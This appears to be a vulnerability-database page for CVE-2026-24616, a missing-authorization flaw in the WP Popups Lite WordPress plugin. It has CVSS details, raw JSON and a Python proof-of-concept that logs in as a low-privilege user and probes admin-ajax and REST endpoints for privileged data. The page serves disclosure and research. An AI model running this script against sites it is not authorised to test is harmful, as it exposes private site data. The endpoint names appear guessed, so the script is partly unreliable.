Security Vulnerability Report
中文
CVE-2026-24616 CVSS 6.5 MEDIUM

CVE-2026-24616

Published: 2026-01-23 15:16:21
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Damian WP Popups wp-popups-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Popups: from n/a through <= 2.2.0.5.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Popups Lite <= 2.2.0.5 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24616 PoC - WP Popups Lite Missing Authorization # Target: WordPress site with WP Popups Lite plugin <= 2.2.0.5 def check_vulnerability(target_url, username, password): """ Check if the target WordPress site is vulnerable to CVE-2026-24616 """ # Setup session session = requests.Session() # WordPress login endpoint login_url = f"{target_url}/wp-login.php" # Login payload login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } # Perform login print(f"[*] Logging in as {username}...") response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed!") return False print("[+] Login successful!") # Try to access privileged functionality without proper authorization # This demonstrates the missing authorization check exploit_endpoints = [ '/wp-admin/admin-ajax.php?action=wp_popups_get_popups', '/wp-admin/admin-ajax.php?action=wp_popups_save_popup', '/wp-json/wp/v2/wp-popups', ] for endpoint in exploit_endpoints: url = f"{target_url}{endpoint}" print(f"[*] Testing endpoint: {endpoint}") response = session.get(url) # Check if we can access privileged data without proper authorization if response.status_code == 200 and ('id' in response.text or 'popup' in response.text.lower()): print(f"[+] VULNERABLE! Could access {endpoint} with low-privilege account") print(f"[+] Response preview: {response.text[:200]}...") return True print("[-] Target may not be vulnerable or plugin not installed") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2026-24616-poc.py <target_url> <username> <password>") print("Example: python cve-2026-24616-poc.py http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] check_vulnerability(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24616", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:20.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Damian WP Popups wp-popups-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Popups: from n/a through <= 2.2.0.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Damian WP Popups wp-popups-lite permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WP Popups: desde n/a hasta &lt;= 2.2.0.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-popups-lite/vulnerability/wordpress-wp-popups-plugin-2-2-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}